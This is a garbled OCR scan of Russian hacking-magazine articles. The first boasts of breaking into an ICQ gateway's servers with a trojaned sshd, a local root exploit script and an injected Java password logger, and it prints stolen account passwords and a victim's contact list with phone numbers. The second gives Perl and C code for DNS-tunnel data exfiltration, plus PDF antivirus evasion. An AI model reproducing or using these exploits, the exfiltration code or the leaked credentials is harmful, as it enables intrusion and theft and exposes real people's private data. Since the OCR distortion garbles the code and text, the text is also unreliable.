/еіс/раззѵѵб на сервере 10.0.0.1: 



баіт:х: 504: 507: : /боте/баіт: /Ып/Тсзб 
ТдаТ_да_Аи1:ота1:іоп :х : 505 : 508 : : /боте/ТдаТ 



ЕКВОВ: ехТга сІаТа а-РТег ІазТ ехресТесІ соіитп 
СОМТЕХТ : СОРУ ааааа, Ііпе 3: "#127.0.0. 1 ТдаТ-орег- 
сІЬ ІідаТ-БТаТ-сІЬ ІосаІбозТ . Іосаісіотаіп ІосаІбозТ 
зегѵегОВ_і1 . ТдаТ . сот" 

Не получив вменяемого ответа от Гугла, я совсем уже было опу- 
стил руки, но тут к делу подключилась свежая голова пожелавшего 
остаться неизвестным хеккера (далее — Анонимус), которому я и 
стукнул в аську :). 

&нон!шус! ГСЯ/ когда П Р ИХ °А ИТ 

Недолго думая, Анонимус воспользовался уже известным тебе веб- 
шеллом на форумах \.\зі, удобно обустроился и получил привилегии 
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Логи птар 

рута. Поиски по серверу снова ничего не дали, постгрес же отве- 
чал гробовым молчанием... Казалось бы, стоит оставить б'аТсот с 
его асями в покое, но не тут-то было: вспомнив о статье ЗЬасІОЗ’а 
«Шапка-невидимка» из 103-го номера журнала [ хакер.ги/тадагіпе/ 
ха/1 03/076/1 .азр ). Анонимус принялся за протроянивание ббЬ. 

По окончании этого нехитрого действия мы имели следующий про- 
фит: 

1. Вход в систему с магическим паролем б'аІсоппраББѵѵогсІ. 

2. Полное протоколирование входящих/исходящих соединений. 

3. Невидимость в системе. 

Тут стоит упомянуть о том, что сервис ббЬ на (огитБ-раТсот и 
остальных серверах локальной сети располагался на необычном 
порту 4430, что помог выяснить установленный два года назад ска- 
нер птар: 

Ноб* 192.168.25.8 арреагз *о Ье ир ... §оосІ. 

Іп*еге5*іп§ рог*5 оп 192.168.25.8: 

(ТЬе 65530 рог*5 зсаппесі Ьи* по* бЬомп Ьеіоы аге іп з*а*е: 

СІ05ѲСІ) 

РОКТ 5ТАТЕ 5ЕКѴІСЕ ѴЕКБІОІМ 

80/*ср ореп Ь**р АрасЬе Тотса*/Соуо*е ЗБР еп§іпе 1.1 
81/*ср ореп Ь**р АрасЬе Ь**рсІ 1.3.41 ((ІІпіх)) 

111/*ср ореп прсЬіпсІ 2 (грс #100000) 

4430/*ср ореп 55Іі ОрепББН 4.3 (рго*осо1 2.0) 

8009/*ср ореп адрІЗ? 

Также, если запустить внешний скан нашего хоста, то можно уви- 
деть следующую информацию: 

Ноб* таі1.*да*.сот (82.80.244.153) із ир (0.22 б 1а*епсу) . 
Іп*еге5*іп§ рог*5 оп таіі .*да* . сот (82.80.244.153): 

РОКТ 5ТАТЕ 5ЕКѴІСЕ ѴЕК5ІОІЧ 

80/*ср ореп Ь**р АрасЬе Ь**рсІ 1.3.37 ((ІІпіх) РНР/4.4.6) 
4430/*ср ореп 55Іі ОрепББН 4.3 (рго*осо1 2.0) 

Эпик фэйл Димы 

После того, как ббЬ был протроянен, нам оставалось лишь подо- 
ждать входа в систему одного из администраторов. Ожидание 
омрачалось лишь одним фактом — команда «Іазі -50» показыва- 
ла, что единственный интересующийся данным сервером юзер 
сііта заходил в систему более года назад. Приняв во внимание 
данный факт, Анонимус предложил уронить какой-нибудь из 
сервисов, крутящихся на данной машине, для привлечения вни- 
мания ожидаемых нами админов. Выбор был сделан в пользу 
Му50І_: /е*с/і піі.сі/ тузц I зіор. 

Спустя несколько часов в лог упал аккаунт сІіта;сІіта76767676, а 
сервис мускуля был снова запущен :). 



Теперь необходимо было проверить данный пароль на соответствие 
остальным серверам в сетке. 

Первая же попытка коннекта «ззЪ. -р 4430 

Літа@192 .168.25.2» показала, что полученный нами пассворд 

подходит как минимум еще к одному серверу і\аі\ 

Последующие тесты, а также логи птар помогли узнать, что наи- 
более интересными для нас серверами являются 192.168.25.5, 
192.168.25.6, 192.168.25.7 и 192.168.25.8 по следующим соображе- 
ниям: 

1. Пароль Димы подошел ко всем перечисленным серверам. 

2. В логах Томката /иБг/ІосаіЛотсаі/ІодБ/ісд был виден реферер 
ѵѵар.ісд.сот (в отличие от Могите, на этих серверах логи были 
открыты на чтение непривилегированному юзеру]. 

3. Логи были всегда свежими. 

РеЬ 17 00:11 . 

РеЬ 17 00:22 . . 

РеЬ 12 23:59 іся_ассе55_1о§. 2011-02-12. *х* 

РеЬ 14 00:00 ісд_ассе55_1о§. 2011-02-13. *х* 

РеЬ 15 00:00 ісд_ассе55_1о§. 2011-02-14. *х* 

РеЬ 16 00:00 ісд_ассе55_1о§. 2011-02-15. *х* 

РеЬ 17 00:00 ісд_ассе55_1о§. 2011-02-16. *х* 

РеЬ 17 02:51 ісд_ассе55_1о§. 2011-02-17. *х* 

Теперь необходимо было порутать наши сервера и подумать над 
получением логинов и паролей к аськам пользователей сервиса. 

Последние рубежи 

На всех нужных нам серверах Анонимус легко справился с задачей 
рутания (а затем и протроянивания) с помощью совершенно разных 
сплойтов, найденных на просторах ехрІоіІ-сІЬ.сот . 

В большинстве же случаев помог небольшой сценарий, эксплуати- 
рующий уязвимость В ѲІІЬс: 

$ тксііг /*тр/ехр1оі* 

$ Іп /Ьіп/ріп§ /*тр/ехр1оі*/*аг§е* 

$ ехес 3< /*тр/ехр1оі*/*аг§е* 

$ 15 -1 /ргос/$$/-РсІ/3 

Іг-х 1 сііта сііта 64 Ос* 15 09:21 /ргос/10836/ТсІ/3 

-> /*тр/ехр1оі*/*аг§е** 

$ гт -г-Р /*тр/ехріоі*/ 

$ 15 -1 /ргос/$$/*сі/3 

Іг-х 1 сііта сііта 64 Ос* 15 09:21 /ргос/10836/ТсІ/3 

-> /*тр/ехр1оі*/*аг§е* (сІе1е*есІ) 

$ са* > рауіоасі.с 

ѵоісі а**гіЬи*е ( (сопв*гис*ог) ) іпі*() 

{ 

ве*иісІ(0) ; 

5у5*ет("/Ьіп/Ьа5Ь" ) ; 

} 

л О 

$ §сс -и --РРІС -зЬагесі -о /*тр/ехр1оі* рауіоасі.с 
$ І5 -1 /*тр/ехріоі* 

-пл/хпл/х — 1 сііта сііта 4.2К Ос* 15 09:22 /*тр/ехр1оі** 

$ *0_АІЮІТ= ,, \$ОКіеіІ\Г ехес /ргос/зеГР/Тсі/З 

бЬ- 4. I# іл/Ьоаті 
гоо* 
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гооі’ на основных серверах 1|'аісот 

Получив таким нехитрым образом абсолютные привилегии на четы- 
рех серверах, обслуживающих сайт ѵѵарДаРсот, Анонимус предло- 
жил встроить в сервис троянский логгер для асек и стал подыски- 
вать нужную точку для инжекта. Таковой оказался ]аѵа-класс /изг/ 
ІосаіДоітісаіЛл/еЬаррзЛл/арісд/ѴѴЕВ-ІМР/сІаззез/соіті/^аі/ісдЛл/ар/ 
зегѵІеіЛ-одіпЗегѵІеТсІазз, который и содержал процедуру асечного 
логина: 



ВиТ-РегесІІлІгіІіег Ьи-р-РегесІ1лІгі1:ег = пиіі; 

Игу { 

Ьи-р-РегесИлІгіИег = пеіл/ Ви-РТегесІІлІгіИег 
(пей? Рі1еІлІгі1:ег(61епате) ) ; 

ЬиТТегесІІлІгіИег .мгіИе(5Иг) ; 

(Ьи-р-РегесІІлІгіИеп != пиіі) { 

ЬиТ-РегесІІлІгіИег . Пизіі ( ) ; 

Ьи-РТегесІІлІгіИег . с1озе( ) ; 

} 

} саИсб (РіІеІМоіРоипсІЕхсерІііоп ех) { 
ех. ргіпИБИаскТгасеО ; 

} саНсб (ІОЕхсерИіоп ех) { 
ех. ргіпИБИаскТгасеО ; 

} 

} 

3. После строки «Зігіпд раззѵѵогб» функция записывала в лог-файлы 
уины с паролями следующим образом: 



5Игіп§ иіп = ІлІеЬБегѵісеІІІііІз .§е1:Кедие5І:Рагате1:ег( 
гедиезі:, РапатеИеп. изегпате. ѵа1ие() ) ; 
і- (иіп == пиіі) 

бИИрБеззіоп . §еИАИИгіЬиі:е( "иіп" ) ; 

5Игіп§ раззыогсі = ІлІеЬБегѵісеІІИіІБ .§еИКедиеБІ:Рагате1:ег( 
гедиезі: , РагатеИег . раззмогсі . ѵа1ие( ) ) ; 

Здесь необходимо было создать некую функцию записи в файл и 
вставить ее после получения пароля пользователя, то есть после 
строки, начинающейся со слов «Зігіпд раззѵѵогб». 

Данная задача была решена Анонимусом с помощью Гугла и 
шаманского бубна следующим образом: 

1. Добавлялись іприИ/оиИриИ пакеты іппрогі ]аѵа.іо.*; 

2. В начале класса РодіпЗегѵІеРсІазз добавилась функция 
ѵѵгіІеТоРіІе: 

риЬІіс ѵоісі ыгіИеТоРі1е(5І:гіп§ біепате, 5Игіп§ бИг) 



ыгіИеТоРі1е("/Итр/1о§5/1о§ісд" + иіп, 
иіп+"; ,, +ра55ыопсI+ ,, \п ,, ); 

Профит! 

Наш незамысловатый логгер проработал примерно неделю до его 
обнаружения админами. За это время мы смогли получить при- 
мерно 6 000 номеров, большинство из которых, конечно же, были 
кривейшими 9-знаками: 

267962705; 5Тат2990 
268196940; ісісМ 
268314965; 9813694 
268524966; пиіі 
268619289; гТ§Ьпду 
2687242; 01еКМу<27 
269558047; ІіТеіес 
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270323224; ІІеѵгІВ 
270405008; ипіѵе§а 
271169757; Міпка0708 
271216896; ЬатЬіп 
271513810; тесіѵесіікі 
2718070; І\І(аЮЕ2Н0(а) 

273801640; таба17 
273967932; апесІ2305 
274288079; 52355200 
274340894; 4672108 
274512176; 

596351383; 121314 
597424414; 0и95тсІ-РР 
597439288; 212008 
597743487; яыега5СІ-Рі23 
597852239; 0422061:І5 
598396568; 357159 
598858992; 15031993 
598965238; ка*еа60 
599046657; 1апсег2000 
599522128; пугек90 
599560833; 2836846 
599916355; 031093 
599922284; пиіі 
599950031; Ьигепа'Ьог 
600223141; -Риск123 
600991756; 123ас456 
601000602; епетепеіісдіаск 
601142649; 2402%5Е_%5Е 
602320989; РКЗК2С7СІС 
602533494; 7Мо30дІ_Х 

Однако среди этого многообразия, как и в прошлые разы, попалось 
п-ное количество админских и просто красивых номеров. По сло- 
жившейся традиции публикую часть контакт-листа одного из таких 
номеров — 44446: 

Іліогк; 10776; заге1;;+972 52 4888601 5М5; 

Іліогк; 11001 ;ѴасІіт;; +972 52 3698945 5М5;Тби ІЧоѵ 23 2006 
12:32:40 

Іліогк; 123178848; зазба; ; +972 (547) 391010;Тие йес 19 
2006 14:51:36 

Іліогк; 12721;уопі1:§; ;+972 502340003 5М5;Моп Зип 19 
2006 08:44:54 

Іліогк; 12826; Огі* Ргесіко-Р;;; 

Іліогк; 13579; Каті; ; ; ТИи 5ер 07 2006 14:58:57 
Іліогк; 14366; аті*;; (972) 524888622;5ип Зиі 30 
2006 09:17:37 

Іліогк; 14441; Коп Нагагі;;+972 52 4888584 5М5;Тби 5ер 
07 2006 15:00:06 



Іліогк; 148171833; На геІЕ-Ргаіт; ;+972 54 3054450 5М5;Тби 
5ер 07 2006 15:00:22 

Іліогк; 148940113;5Р; ;+972 (54) 4902642;Моп Зип 19 
2006 08:43:46 
Іліогк; 15123; Ки1:і;;; 

Іліогк; 166967874; еіпаі:;; (972) 524888588;Моп йес 18 

2006 09:42:10 
Іліогк; 16781; ВоІ_о; ; ; 

Іліогк; 16878;Місбае1 Собеп;;+972 54 4527767 5М5;Моп Зип 
19 2006 08:43:46 
Іліогк; 18981; Ербгаіт; ; ; 

Іліогк; 19791; Ног;; +972 52 4888605 5М5;Ргі Зап 12 

2007 12:58:39 

Іліогк; 199516410;Са1іа;;+972 52549822 5М5;Моп Зип 19 
2006 08:43:46 

Іліогк; 20304; Эапа; ;+972 54 4954265 5М5; 

Іліогк; 214509417; оигіеі;; (972) 523023131; Тби 5ер 07 
2006 14:58:47 

Іліогк; 21512; ІМоат ;);;(972) 4234556;Моп Зип 19 
2006 08:43:45 

Іліогк; 219380542; уаіг; ;+972 52 4888596 5М5;Моп Зип 19 
2006 08:42:40 

Іліогк; 22221; Озпаі:; ;+972 52 6122604 5М5;Тби 5ер 07 
2006 14:58:37 

Іліогк; 22580; Раг; ; ;Моп Зип 19 2006 08:42:40 
Іліогк; 23004; Сбаппу; ; ; Ргі Зиі 14 2006 09:40:22 
Іліогк; 23232; К1іе§ег; ; ;Моп Зип 19 2006 08:42:40 
Іліогк; 23234; Ѵі-Раі:;; +972 52 4888575 5М5;5а* йес 16 
2006 06:05:05 

Как видишь, ѴѴАР ІСО-шлюз 1)'а1:.сопп по-прежнему пользуется попу- 
лярностью среди определенного круга людей, хотя надо заметить, 
что эта популярность значительно упала по сравнению с 2006-2008 
годами. 

Кстати, примерно в то же время Анонимус случайно заглянул в 
каталог Атр на Ьгитз.раКсот и обнаружил в нем подозрительные 
файлы вида Ітр_І\Іадіо5_ргос.63.218.56.1 1 .розітазіег, Ітр_І\Іадіо5_ 
ргос.63.218.56.5даѵа и так далее. 

После быстрой проверки выяснилось, что эти сервера обслуживают 
один сайт — тіаті.раі.сот . на который вел редирект с основного 
домена раі.сот и который, в отличие от ууар.раКсот . содержал 
еще и сервис для общения в русской социальной сети ВКонтакте. 
Конечно же, сразу был проверен (и сразу подошел] ранее получен- 
ный пароль Димы, а внезапно найденная вторая сетка Даі была 
быстро порутана и протроянена :). 

Напоследок 

После обнаружения логгера админы, мало того, что не пропатчили 
свои сервера, но еще и: 

1. Не изменили ни одного пароля. 

2 . Не удалили троянский ззб. 

3. Вообще не позаботились о дальнейшем обеспечении безопасно- 
сти своей системы (и это после третьего известного им взлома!). 

В связи с данными обстоятельствами Анонимус, конечно же, пред- 
ложил создать более продвинутый логгер для всех сервисов Да! и 
поиметь, помимо I СО, кучу аккаунтов М5І\І, РасеЬоок и иже с ними, 
но это уже другая история :). В целом же, оглядываясь на этот 
воистину эпохальный взлом целой армады серверов одного сер- 
виса, я бы посоветовал тебе никогда и нигде не использовать 
одинаковые пароли (главная уязвимость Да! — один и тот же 
пароль), а также внимательнейшим образом следить за безопас- 
ностью подконтрольных тебе систем. 

Надеюсь, что в третий раз я, наконец, смогу поставить точку во 
взломе многострадального і^аі.сот :]. т 
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■ ■Алексей Синцов, Оідііаі Зесигііу (іѵѵіиег.сот/азіпізоѵ) 





Обходим преграды и организовываем 
доступ в Сеть 

• Выполняя заказы на тему социальной инженерии, мне не раз прихо- 
дилось сталкиваться с вопросом: как получать отклик с пробитых ма- 
шин? В нормальных компаниях зачастую стоит прокси-сервер, и пря- 
мой доступ в инет пользователям урезан. Но ведь работу-то надо 
делать... Своими наработками на эту тему я и поделюсь. 



Задача 

Простейшая задача, которая ставится заказчиком, — проверить бди- 
тельность своих работников. В российской практике это называется 
«Социальная инженерия + рассылка». Другими словами, выбранной 
группе товарищей, которые ничего не подозревают, рассылаются 
письма. В тексте письма чаще всего и заключается социальная инже- 
нерия. Задача: заинтересовать читателя и выполнить некое действие 
— например, открыть ехе-файл или перейти на вредоносный сайт. 

Все такие случаи должны регистрироваться, а кроме того, необходимо 
показать заказчику, что это привело к проникновению в сеть корпо- 
рации. То есть надо продемонстрировать эффект проникновения. Мы 
в Оідііаі Зесигііу уже давно не рассылаем ехе-файлы, так как такой 
аттач сильно снижает эффект от социалки — за пятнадцать лет все 
пользователи персональных компьютеров получили опыт войны с 
вирусами и расширение .ехе в аттаче письма вызывает негативные 
ассоциации даже у домохозяек (не говоря уже о том, что такие письма 



блокируются чаще всего). Поэтому самые эффективные аттачи — рсТ- 
файлы с эксплойтом. А еще эффективнее — ненавязчивый линк в 
теле письма. Переход по линку легко регистрировать, а также можно 
попытаться эксплуатировать уязвимости. На нашем стенде присут- 
ствует простейший баѵаЗсгірІ:, который определяет версии таких про- 
грамм, как ОиіскТіте, АсгоЬаІ Реабег, Ріазб Ріауег, баѵа, ѴІ_С Ріауег. 
Иногда в случае обнаружения уязвимой версии можно автоматически 
применить эксплойт (подчеркиваю — иногда, эксплойт не всегда 
является хорошим решением). Так или иначе, последний шаг — реги- 
страция факта проникновения — как правило, это результат выполне- 
ния команд консоли на захваченных рабочих станциях. Но вот тут есть 
одно «но». Как управлять данными или получать их с корпоративных 
рабочих станций? Ведь геѵегзе Іср зЬеІІ и, тем более, Ьіпб Іср зЬеІІ не 
будут работать. Дело в том, что для организации доступа в интернет 
применяется прокси-сервер. При таком раскладе подход геѵегзе Іср 
не будет работать. Часто эти прокси еще и с аутентификацией. 
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Социальный РЭР сильно детектируем 




Прокси-сервер 

Самое простое решение — использование прокси-сервера. 
Например, если в настройках ОС/ІЕ прописаны настройки соеди- 
нения, то использование СОМ-объекта ІЕ или ХМІ_НТТР позволит 
выполнять 0ЕТ/Р08Т-запросы на сервер пентестера и таким обра- 
зом осуществлять контроль над «ботом». Данный метод хорош, но 
он не работает, если: 

• Не прописаны настройки прокси-сервера; 

• прокси-сервер режет соединения на левые хосты 

(белый лист); 

• пользователю доступна только почта., ему вообще никак 

в инет не попасть. 

В этих случаях нужно искать другой путь. 

ОЫ5 

Так как задача не нова, то и решение давно уже известно. Ответ 
прост — используй РЫБ. Маневр в том, что пентестер (или злоу- 
мышленник, или еще какой кулхацкер) покупает себе домен (от 
400 до 800 рублей), поднимает «свой» 0145-сервак и прописывает 
его как «ответственного» за данный домен. Делается это доволь- 
но просто. Купив домен, надо отметить 145-записи у регистратора, 
указав свой ІР-адрес (внешний). На этом адресе повесить свой 
0145-сервак и настроить его так, что бы он отвечал на БОА, А, 
АААА, СІ4АМЕ и ЫБ/ВЫБ-запросы. А они пойдут от различных кор- 
невых серваков. Часов за 7-8 интернет прознает про твой домен 
и про то, что на ІР-адресе висит сервак РЫБ, который за него и 
отвечает. Какой физический смысл у данной системы? А такой: 
допустим, ты купил домен аЬсб.ги, а некий индивидуум попытался 
определить ІР-адрес для рогпо.абссі.ги. При таком раскладе 0145- 
сервак нашего индивидуума, который прописан как основной, 
попытается понять, что это за домен. В результате он узрит, что за 
домен аЬсб.ги отвечаешь ты, и пошлет свой 0145-запрос на тему 
«Кто есть рогпо.абссі.ги» (А-запись и АААА-запись для ІРѵб). Твой 
0145-сервак прошерстит записи зоны и ответит, что такого имени 
у него нет, либо возвратит один или более ІР-адресов, которые 
потом вернутся клиенту через его 0145-сервер. В контексте нашей 
задачи это почти идеальное решение. В любой компании, у вин- 
довых клиентов/пользователей/офисных сотрудников почти всег- 
да прописан локальный РЫБ. Обычно это контроллер домена, на 



котором поднят 0145-сервис. Даже те счастливчики, для которых 
жестко порезан список доступных ресурсов или которым интернет 
вообще запрещен корпоративной религией, могут узнать ІР-адрес 
любого домена. Это утверждение почти (подчеркиваю — почти) 
всегда истинно, так как нет никаких запрещающих правил на 
то, какие имена могут «резолвить» клиенты в локальной сетке. 

Но для организации канала этого достаточно. Ведь хххх.абссі.ги 
создан на стороне корпоративного клиента и, в конечном счете, 
по цепочке попадает через Сеть к хацкеру. При этом «хххх» могут 
быть вполне конфиденциальными данными. Более того, 0Ы5 
хакера вернет ответ, который так же через цепочку дойдет до 
рабочей станции в локалке «без инета». Ответом будет список 
ІР-адресов, которые могут быть интерпретированы принимающей 
стороной как команды для бота. Фактически, это хороший способ 
управления ботами :). 

Плюсы налицо: 

• Боту не нужен доступ к интернету; 

• 0І\І5-запросы редко фильтруются (в отличие от НТТР); 

• дуплексная связь. 

Минусы также очевидны: 

• Ограничения по размеру пакета; 

• пакеты идут медленно (на практике от 1 до 3 секунд); 

• не все байты можно передавать ОІМ5- запросом. 

Как видишь, минусы ответственны за увеличение объема 0145- 
запросов и падение скорости передачи данных. Кроме того, эти 
факторы приводят к вопросам синхронизации данных при пере- 
даче, так как бывает, что первый запрос может прийти только уже 
после того, как пришел третий. 

Баян сіеіесіесі! 

Как я уже говорил, все, о чем написано в этой статье, не ново — эти 
идеи витают в воздухе уже много лет. Но вот практических нарабо- 
ток (в паблике) было мало. В прошлом году Рон Боус реализовал 
сіпзсаі — тулзу, которая позволяет туннелировать трафик в 0145- 
запросах. Кроме того, он написал шелл-код, который туннелирует 
консоль управления, используя 0145-запросы типа ТХТ (в них можно 
больше впихнуть в рамках одного запроса). Все это круто, но на 
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Примерная схема работы реверсивного бота 

практике мне не удалось применить эти тулзы по следующим при- 
чинам: 

• сіпзсаі: не стабилен - от любого "левого" ШР-пакетика 
падает; 

• шелл-код огромен - чуть больше 1000 байт, не влезает 
в некоторые эксплойты; 

• В ходе массовых рассылок мне интерактивный шелл 
не нужен, мне нужен автоматизированный сбор доказа- 
тельств проникновения; 

• шелл-код создает сокет и работает с іл/іпзоск2, что 
в ряде случаев может вызвать проблемы (например, 

ІІАС среагирует на исходящий коннект в ілііпсіоіл/з 7). 

Поэтому было принято решение разработать пейлоад, который не 
обладал бы данными недостатками. 

Сервер 

Так как хотелось бы передавать запросы без использования соке- 
тов, то самое простое — это внедрять данные в поддомене, как 
было описано в примерах выше. Это, конечно, увеличит количество 
запросов, но так как для моих задач мне не требуется передача и 
интерактивность, то это несущественно. Итак, сервер было решено 
писать на регі, так как я его люблю, и так как в срап есть хороший 
модуль ЫеВіВЫБ. Установив его, можно клепать свои серваки с 
собственной логикой :). В моем простейшем варианте не нужно 
отдавать команды —только собирать логи фактов проникновения, 
поэтому код достаточно прост. 

#! /изг/Ьіп/регІ 

изе №1:: :йМ5: :Матезегѵег; 
изе зіігісі: ; 
изе ыагпіп§з; 

$ООМАІМ="аЬссІ . ги"; # домен 
$МѴІР="123.123.123.123"; # наш внешний адрес 
$5ІТЕІР="1 . 2.3.4"; # ответ 

• обработчик запросов 




Метасплойт отвергает шелл-код для выбранного экс- 
плойта 



зиЬ гер1у_бапсІ1еп 

{ 

ту ($рпате, $рс1азз, $р1уре, $реегІіо5І:,$риегу,$сопп) = @_; 
ту ($гсосІе, @апз, @аи1:И , (ЭасІсІ); 

# запрашивают аЬссІ.ги 

і-р ($р1:уре ер "А" && $рпате ер $йОМАІМ ) 

{ 

ту ($1:1:1, $гсІа1:а) = (3600, $5ІТЕІР); 
ризИ @апз, №1:: :РМ5: :КК->пем( 

"$рпате $1:1:1 $рс1азз $р1уре $гсІа1:а"); 

$гсосІе = "ІМОЕККОК"; 

} 

еізі-р (($р1уре ер "А")&& $рпате =~ /( . *)\.$ООМАІІ\І/) 

{ 

$гсосІе = "ІМОЕККОК"; 

ту ($1:1:1, $псІаі:а) = (1, $5ІТЕІР); 
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сіпзсаі в процессе работы 



ризМ @ап5„ №Т: :йМ5: :КК->пем( 

"$Япате $1:1:1 $яс1азз $яіуре $гсІа1:а " ) ; 
ргіпі: "КесеіѵесІ циегу ($япате) ($яТуре) Тгот $реегбоз1: іо" 
.$сопп->{ ,, 50скбо51: ,, }. "\п"; 

# обработаем данные 

ту $гея=$1; # поддомен ~ данные 
ту $1еп= 1еп§іб($гея); 
ту $ап5м=""; 

# перебираем данные и декодируем 
Тог(ту $і=0; $і<$1еп; $і+=2) 

{ 

# старший разряд 

ту $Ьб = (огсКзиЬз1:г($геЯ:,$і,1))-0х61) << 4; 

# младший разряд 

ту $Ы = огсІ(5иЬ5І:г($гея., ($і+1) ,1))-0х61; 
ту $Ьі = сИп ( $Ьб + $Ы); # декодированый байт 
$апзм.= $Ьі; 

} 

# пишем в лог 

ореп (ЮС, ">>0АТА.1о§" ); 

ргіпі: ЮС "[$реегбоз1:] [$япате] [$ап5іл/]\п"; 

сіозе (ЮС); 



} 

еІ5І-Р( $япате ея $йОМА1М ) 

{ 

$гсосІе = "ІМОЕККОК"; 

} 

еізе 

{ 

$гсосІе = 'тоОМАИМ"; 

} 

# даем 100% ответ как владельцы домена. . . 
геіигп ($гсосІе., ДЭапз, \@аи1:М „ \@асІсІ, { аа => 1 }); 

} 

# инициализируем обработчик 

ту $пз = №і: ЮИБ: :Матезегѵег->пеіл/( 

І_оса1Рогі => 53 „ 

КерІуНапсІІег => \&гер1у_ІіапсІ1ег л 
ѴегЬозе => 

) | | біе "соиісіп'і: сгеаіе патезегѵег оЬзесіХп"; 

# Го-го-го! 

$п5->таіп_1оор; 



Как видишь, имя до точки содержит закодированные данные. 
Кодировать я стал также, как и в случае с адресами в своем ЛТ- 
5РРАѴ шелл-коде, и абсолютно так же, как до этого додумался Рон. 
Разбиваем байт данных на два значения — старший разряд по НЕХ 
и младший, после чего добавляем эти значения к константе 0x61 , 
что означает А5СІІ символ 'а'. Другими словами, нам надо пере- 
дать символы \г\п — \х0А\х0Р, разбиваем их на младший и старшие 
регистры: 

0х0А >> 4 = 0x0 
0Х0А&0Х0Р = 0хА 

0х0й >> 4 = 0x0 
0Х0О&0Х0Р = 0хй 

Затем складываем с 'а': 

0x61 + 0x0 = 0x61 ~ ' а ' 

0x61 + 0хА = 0x6В ~ ' к ' 

0x61 + 0x0 = 0x61 ~ 'а' 

0x61 + 0хй = 0х6Е ~ ' п ' 

Таким образом непередаваемая последовательность «\г\п» пре- 
вращается в «акап». Соответственно, сервер декодирует по тому 
же принципу, вычитает 0x61, делает сдвиг на 4 бита и складывает. 

Клиент 

Клиентская нагрузка — самая важная часть, которая была написана 
на скорую руку на Си: 

#іпс1исІе кыіпсіоыб . б> 

іпі _ітаіп(іп1: аг§с^ _ТСНАК* аг§ѵ[]) 

{ 

РНЕ *Тріре; 

// прошиваем команду 

// этих данных мне достаточно для доказательства 
// проникновения 
ебс *соттапсІ = 

"стсі /с есбо %изегпате% & ірсопб§ & пеі изег"; 
сбаг *сІотаіп = " .аЬссІ.ги. // домен 
сбаг 1іпе[1556]; // максимальный объем 
сбаг зиЬсІп5[150] = "пзіоокир 

// нам не нужны сокеты - это палево 

НІлП\Ю біліпсі = Се 1 :Соп 501 еІлІіпсІоы( ) ; 
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Пейлоад для Меіазріоіі 



5ііоы1лііпсіоы( Іпіліпб, ЗІлМНЮЕ ); // надо быть невидимым 

-рріре = (РІІ_Е*)_рореп(соттапб., "г"); 

// выполняем команду 



еізе 

{ 

5иЬсІП5[2]= 0x61 + ІіЬ; 

} 



і 52=-Ргеаб(1іпе., 1Д555, Тріре); // читаем результат 

1іпе[52]=Ѳ; 

_рс1озе(-Рріре) ; //4 

бііогі: і=0; 
бііог пехі:=1; 

// кодируем по 28 байт на запрос и шлем 
// будет 55 0І\І5-запросов максимум 
сіо { 

бііогі: с = 0; 

БІІОГІ 2 = 11; 

5ііЬсіп5[9] = 0хб1+(пех1:>>4) ; 
бііЬ6п5[10] = 0х61+(пех1:&0х0Р) ; 

Тог(; і<1555, с<28; і++, г+=2, с++) 

{ 

//кодируем байт 
(1іпе[і]==0х00) 

{ 

виЬсІп5[2]=0; пехі=-1; Ьгеак; 

} 

сііаг МЬ=1іпе [ і ] >>4; 

1Ь=1іпе[і]&0х0Р; 

//работаем с 005-кодировкой русских символов 
і-р( ИЬ<0х0) 

{ 

виЬсІп5[2]= 0x61 +(ІіЬ&0х0Р); 

} 



// собираем результат кодировки 
51іЬсІП5[2+1]= 0x61 + 1Ь; 

} 

// добавляем домен 
-Рог(Іп1: у=0;у<9;у++) 

{ 

5иЬсІп5[2+у]=сІотаіп[у] ; 

} 

виЬсІп5[2+у]=0; 

// выполняем "пБІоокир ххххххххххх.ххххх.аЬссІ.ги" 

// этим самым выполняем передачу данных 
// без палева 

■рріре = (РІІ_Е*)_рореп(5иЬбп5., "г"); //1 
_рсІ05е(-Рріре) ; //4 

пехі++; 

} мбі1е(пех1:) ; 

геіигп 0; 

} 

Данный бинарник был перешит в бАѴА-апплет и засунут в РйР. 
Таким образом, если пользователь переходит на наш сайт по 
линку из письма, система определяет у него 6АѴА и запускает 
апплет с данным «экзешником». Если дополнительно опреде- 
ляется АбоЬе АсгоЬаІ Реабег < 9.3.3, то суется рбР-файл. В РйР 
используется уязвимость запуска аттача в Рохіі/Асго Ьаі Реабег, 
обнаруженная Дидье Стивенсом прошлым летом, о чем я писал 
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Относительно читабельные логи, зато с поддержкой русского языка :) 



тогда в обзоре. Суть уязвимости в том, что пользователю с 
АсгоЬаІ Реабег < 9.3.3 выводится произвольное сообщение, 
мотивирующее к нажатию кнопки «Открыть». Если пользователь 
нажмет-таки этот кнопарь, то выполнятся несколько команд, 
прошитых в РОЕ, которые создадут ѴВБ-скрипт (типа «- стсі \с 
есбо собе > зсгірі & есбо собе >> зсгірі»), после чего запустят 
его. Скрипт, в свою очередь, откроет рбб-фа йл , вытащит оттуда 
бинарные данные вышеуказанного екзешника и исполнит его. 
Для создания такого РОЕ можно воспользоваться метсасплой- 
том, модуль ѵѵі пб оѵѵз/^і Іебо гтаі/а б о Ье_рбб_ет Ьебб еб_ехе_п о]з. 
Соответственно, выбираем любой пейлоад, а потом в готовом 
файле заменим тело экзешника пейлоада из метасплойта на 
тело нашего экзешника. Созданный )аѵа-апплет не детектит 
ни один антивирус, зато РОЕ'ку детектит аж восемь штук. Оно 
и понятно, я вообще не очень люблю использовать эксплойты 
на таких работах, так как они хорошо палятся корпоративны- 
ми антивирями по сигнатурам атак, хип-спрею, используемым 
адресам и так далее. Это все, конечно, можно обойти, но долго и 
дорого, так что проще использовать социальные методы + )аѵа- 
апплет. 

Небольшие ковыряния позволили вычеркнуть семь антиви- 
русов, и в итоге мой рсІСфайл детектил только движок АѵазЕ 
Самое забавное, что часть антивирусов отрубилась отклю- 
чением обфускации в тегах РОЕ. Метасплойт по умолчанию 
обфусцирует рандомные участки тегов, но антивирусы считают, 
что такая обфускация подозрительна. Так что, убрав излишки 
маскировки, часть антивирусов мы успокоим. Другие антивирусы 
реагировали на код ѴВБ-скрипта в теле РОЕ, что, наоборот, обо- 
шлось обфускацией. Так как код вносится через СМ0, то можно 
спокойно ставить символ ' л ' перед любыми АБСІІ-символами: 
вроде для стб.ехе строка не изменилась, зато антивирус- 
ные сигнатуры в обломе, так как для них «ѴѴБсгірІ.БЬеЦ» не 
равно «\Л/5с л п л рС5 л Ье11». Кроме того, есть еще конкатенация: 
«ѴѴБсгірЕБЬеІІ» не равно «\Л/5сгі»&»р1:.5Ь»&»еІІ». Обновленный 
модуль для особо интересующихся я выложил на диске. 

